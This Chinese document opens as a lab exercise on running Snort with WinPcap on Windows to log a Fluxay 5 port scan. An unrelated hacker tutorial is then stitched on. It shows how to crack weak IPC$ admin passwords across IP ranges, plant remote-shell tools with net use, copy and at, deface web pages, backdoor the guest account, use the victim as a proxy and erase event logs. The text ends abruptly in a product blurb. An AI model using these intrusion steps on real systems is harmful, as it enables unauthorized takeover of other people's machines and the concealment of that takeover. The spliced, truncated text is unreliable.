实验一 Windows平台下Snort的应用.doc

实验一 Windows平台下Snort的应用【实验背景】Snort是一种跨平台、轻量级、基于特征匹配的网络入侵检测系统。系统采用灵活的体系结构，大量使用插件机制，具有很好的扩展性和可移植性。本试验要实现采用流光软件对目标主机进行扫描；用Winpcap软件捕获数据包；用Snort进行分析，并介绍Windows平台下的Snort应用软件IDSCenter。主要下载站点有/、/、/。【实验目的】掌握用Snort作为基于主机的入侵检测系统(HIDS)的使用。【实验条件】(1) Winpcap2.3，Snort2.0，IDScenter1.1 RC2，Fluxay5；(2) HIDS主机A：Windows 2000/2003，IP地址0/24；(3) 攻击主机B：Windows 2000/2003，IP地址1/24。注：IP地址可以根据实验室主机配置不同进行设置。【实验任务】(1) 学习使用Snort数据包检测和记录功能；(2) 通过IDScenter配置功能加强对Snort原理的理解。【实验步骤】 1. 安装数据包捕获软件由于Snort本身没有数据包捕获功能，因此需要用其他软件来捕获数据包。Winpcap是libpcap抓包库的Windows版本，它同libpcap具有相同的功能，可以捕获原始形式的包。在HIDS主机上安装Winpcap过程如下：(1) 双击winpcap-2-3.exe 启动安装；(2) 屏幕出现欢迎对话框，单击“Next”按钮；(3) 下一个对话框提示安装过程完成，单击“OK”按钮完成软件安装。(4) Winpcap安装成功，重新启动计算机。2. 安装Snort软件在HIDS主机上安装Snort软件过程如下：(1) 双击Snort -2.0.exe，启动安装程序；(2) 启动安装以后，会看到关于Snort的一篇文献，阅读并单击“I Agree”按钮；(3) 出现的是安装选项对话框，单击“Next”按钮；(4) 将选择安装部件，选择完毕后单击“Next”按钮；(5) 现在提示安装位置，使用默认的，并单击“Install”按钮；(6) 安装完成，单击“Close”按钮。3. 在攻击主机B上安装流光5(Fluxay5)扫描软件，默认安装即可4. Snort数据包嗅探及包记录应用(1) 用Ping命令测试HIDS主机A与攻击主机B网络连通。(2) 在A机器上单击“开始”“运行”，在【运行】窗口中输入“cmd”打开DOS界面，如果在Snort安装时选择的默认安装路径为C：，则在DOS界面中打入命令“cd C:snortbin”进入snort安装目录，然后打入如下命令以数据包记录的形式启动Snort：snort-dev-l /snort/log-h 0/24。此命令为记录子网为0/24的数据，并把捕获的数据文件保存到Snort/log目录下，此时可以在屏幕上不断显示嗅探到的数据包，显示满一页后就不断滚屏。(3) 在B机器上启用扫描软件流光5，右击“IPC$主机”“编辑”“添加”，在【添加主机】窗口中加入要扫描的主机“0”即安装了Snort的HIDS主机，如图1所示。图1 流光探测主机(4) 在流光5软件中右击“0”“探测”“扫描主机端口”，确定端口扫描范围后，对HIDS主机进行端口扫描，扫描到的结果如图2所示。图2 扫描结果(5) 在HIDS主机的DOS界面下可以看到从B机器扫描发过来的探测的数据包信息，如图3所示。使用Ctrl-C键可以退出程序，看到数据包统计信息。图3 DOS界面上的数据包显示(6) 在Snort/log目录下打开文件名为“1”文件夹，可以看到很多刚才B机器上对A机器进行扫描的数据包记录，如图4所示。图4 7.15 log目录下记录的数据包信息对记录的数据包信息作进一步的分析，如图5所示。图5 数据包记录检测到此数据包的信息如下： 源MAC地址：0：11：D8：7B：7：3B； 目的MAC地址：0：11：D8：7B：7：89； 类型：0*800，长度：0*3E； 源IP地址：1，源端口：1053； 目的IP地址：0，目的端口：80； 协议类型是：TCP；TTL(生存时间)：128；TOS(服务类型)：0*0；ID：205；IP包头长度：20；数据包总长度：48 DF。后面的一段信息显示此数据包企图探测连接目的主机80端口。从上面的数据包记录的信息来看，就可以知道网络上有人可能在扫描HIDS主机端口的开放情况，必须采取措施将端口关闭或更改。5. Snort用于入侵检测功能Snort除了数据包嗅探和数据包记录的功能外，还有很重要的一个功能就是入侵检测(IDS)功能，能够应用Snort的规则集来检测特定网络的可疑行为，本实验不作详述。6. IDScenter应用在HIDS主机上安装IDScenter，只需要双击安装程序，一步步按照默认安装即可。当启动IDScenter应用程序后，它将出现在系统任务栏上并显示为一个大黑点，单击这个黑点就可以打开配置窗口了。对于IDScenter进一步的学习和使用，可以通过互联网搜集相关的资料，这里不再详细说明。【思考与练习】1.简述Snort系统的特点2.设计并实现一个Snort入侵检测的完整过程。流光5.0流光5.0流光5.0的破解可分为5大部分： 一、POP3/FTP/探测二、IPC探测三、SQL探测四、高级扫描五、其它 因为开发时间的原因，上面的探测模式略有不同，所以分成了四个部分，本教程说的是第一个部分的探测。后面的探测模式应该属于流光5.0的高级应用了：）流光5.0的IPC探测： 一、目的和任务： 1、用流光5.0的IPC探测获得一台NT主机的管理权限，并将这台主机做成一个跳板/代理。 2、学习IPC探测的相关知识。 二、探测流程： 1、你得有流光5.0，我这里试验用的是流光5.02001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/ 2000提供的功能。而且流光5.0FOR 2K 要求你的操作系统得是NT/2000，否则流光5.0启动会失败！ 什么是IPC： IPC是指InterProcess Communications,准确的说是ipc$，是默认的在系统启动时的admin共享。 IPC$是Windows NT/2K中特有的远程网络登陆功能，它的特点是在同一时间内，两个IP之间只允许建立一个连接。 注意，你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。 可不可以通过IPC$暴力破解密码？当然可以 ！ 不过，是不是太笨了点 2、首次启动流光5.0，会看到注册的画面，具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板，那么就可以用命中率高的办法来探测了（测试一堆IP来得到弱口令）。 在主界面选择 探测探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。 3、出先了上面的小窗口，输入我们要破解的IP段，我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令，这样可以加快扫描的速度 ：）填入IP，选择扫描NT/98主机 4、探测中 （注意如果你要探测的是流光5.0保留的国内的IP段，会被禁止的，也就是探测的时候信息栏出现IP保留的字样） 有远程主机的管理密码了，我们剩下的就是想办法控制它了，有什么好办么？ ：）有的是 ！自己看看工具菜单下的IIS远程命令:)是不是很简单呢，我以后在说，今天还是先练习net 命令吧。 黑了他 ！ 开个dos prompt 执行如下命令，本次用的例子如下图。 1、 net use 对方ipipc$ 密码 /user:用户名 | 建立远程连接 2、 copy icmd.exe 对方ipadmin$ | admin$是对方的winnt目录 ：） 这里文件多。 3、 net time 对方IP | 看看对方的本地时间 4、at 对方ip 启动程序的时间 启动程序名 启动程序的参数 | 用at命令来定时启动程序，在这里我们用soon这个程序来做也可以，它可以取代 3/4两步。 5、 telnet 对方ip 端口 | 6、输入pass （如果不是用icmd.exe，或者没有设置口令就不用了） | 7、在开个窗口，继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe 如果我们真的想黑了他，只需要把我们的首页文件覆盖目标的首页就ok了，我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止，一般是在X:interpubwwwroot . 假如首页文件是default.htm并且在c:interpubwwwroot，这样:copy default.htm ipc$interpubwwwroot 下面的图有演示 8、其实黑人家是很低级并且没意思的：（，我们最好是物有所有，作成跳板吧，今后干活方便点： 执行我们copy 过去的ntlm.exe ，取消验正。在给自己留个后门，比如提升guest的权限，或者其它的后门工具，这类东西多了自己选吧，看看杀手copy的那堆东西 ：） 9、还能做成其他的么 ？ 当然了，只要你有时间，并且愿意做，我曾经偷偷的把自己的主页放到人家的server上，速度快、空间无限，嘿嘿 ：） 10、日志清除，断开连接 ： 执行我们copy 过去的cl.exe clear.exe 都可以清除日志，比如clear all ：清除所有的日志。然后在断开连接：net use ipipc$ /delete 流光5.0简介流光5.04.7)一个绝好的ftp、pop3解密工具，界面豪华，功能强大！功能简介如下：1、用于检测POP3/FTP主机中用户密码安全漏洞。2、163/169双通。3、多线程检测，消除系统中密码漏洞。4、高效的用户流模式。5、高效服务器流模式，可同时对多台POP3/FTP主机进行检测。6、最多500个线程探测。7、线程超时设置，阻塞线程具有自杀功能，不会影响其他线程。8、支持10个字典同时检测。9、检测设置可作为项目保存。10、取消了国内IP限制而且免费。流光5.04.7新增功能：1、加入了本地模式，在本机运行是不必安装Sensor。 2、Sensor扫描临时结果文件(*.PTR)的尺寸大约减少了10倍。 3、后台扫描模式时，扫描的结果（*.PTR）可以直接通过